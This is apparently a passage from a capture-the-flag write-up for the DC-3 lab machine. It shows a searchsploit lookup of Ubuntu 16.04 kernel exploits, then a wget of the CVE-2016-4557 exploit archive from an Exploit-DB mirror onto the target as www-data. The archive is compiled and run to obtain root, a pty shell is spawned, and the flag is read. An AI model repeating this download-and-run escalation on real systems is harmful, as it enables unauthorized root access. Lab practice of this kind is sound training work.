Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Co | linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege E | linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker- | linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local | linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16 | linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/1 | linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overfl | linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KAS | linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privil | linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_cc | linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF | linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 | windows_x86-64/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' | linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_R | linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel P | linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - L | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Pr | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfil | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/1 | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 /  | linux/local/47169.c
----------------------------------------------------- ---------------------------------
Shellcodes: No Results

uname reports kernel 4.4.0-21 on a 32-bit (i686) system, so the x86-64-only entries are out. The double-fdput() one, 39772 (CVE-2016-4557), targets exactly 4.4.0-21 and is not tied to x86-64, so that is the one to use.

└─# searchsploit -p 39772.txt
  Exploit: Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation
      URL: https://www.exploit-db.com/exploits/39772
     Path: /usr/share/exploitdb/exploits/linux/local/39772.txt
    Codes: CVE-2016-4557, 823603
 Verified: True
File Type: C source, ASCII text

└─# cp /usr/share/exploitdb/exploits/linux/local/39772.txt 1604.txt

└─# vim 1604.txt
# it is long; the usage section is at the bottom
……
An exploit that puts all this together is in exploit.tar. Usage: 

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7


Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552

# download link for the archive; fetch it from the target (this box has outbound internet; otherwise serve the file from Kali with python3 -m http.server and wget it from there)
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip



www-data@DC-3:/var/www/html/templates/beez3/html$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
--2024-01-10 14:57:51--  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
Resolving gitlab.com (gitlab.com)... 172.65.251.78, 2606:4700:90:0:f22e:fbec:5bed:a9b9
Connecting to gitlab.com (gitlab.com)|172.65.251.78|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/octet-stream]
Saving to: '39772.zip'

     0K ......                                                100% 11.2K=0.6s

2024-01-10 14:57:53 (11.2 KB/s) - '39772.zip' saved [7025/7025]

Unzip it

www-data@DC-3:/var/www/html/templates/beez3/html$ unzip 39772.zip
unzip 39772.zip
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/.DS_Store
   creating: __MACOSX/
   creating: __MACOSX/39772/
  inflating: __MACOSX/39772/._.DS_Store
  inflating: 39772/crasher.tar
  inflating: __MACOSX/39772/._crasher.tar
  inflating: 39772/exploit.tar
  inflating: __MACOSX/39772/._exploit.tar

www-data@DC-3:/var/www/html/templates/beez3/html$ cd 39772
cd 39772

www-data@DC-3:/var/www/html/templates/beez3/html/39772$ tar -xvf exploit.tar
tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c

Follow the usage from the advisory

www-data@DC-3:/var/www/html/templates/beez3/html/39772$ cd ebpf_mapfd_doubleput_exploit
cd ebpf_mapfd_doubleput_exploit
www-data@DC-3:/var/www/html/templates/beez3/html/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput.c
hello.c
suidhelper.c

www-data@DC-3:/var/www/html/templates/beez3/html/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
               
www-data@DC-3:/var/www/html/templates/beez3/html/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.

suid file detected, launching rootshell...
we have root privs now...

id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

The raw shell is awkward to use, so spawn a proper pty with python

python -c 'import pty; pty.spawn("/bin/bash")'
root@DC-3:/var/www/html/templates/beez3/html/39772/ebpf_mapfd_doubleput_exploit# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

root@DC-3:/var/www/html/templates/beez3/html/39772/ebpf_mapfd_doubleput_exploit# cd /root
cd /root
root@DC-3:/root# ls
ls
the-flag.txt
root@DC-3:/root# cat the-flag.txt
cat the-flag.txt
 __        __   _ _   ____                   _ _ _ _
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)


Congratulations are in order.  :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

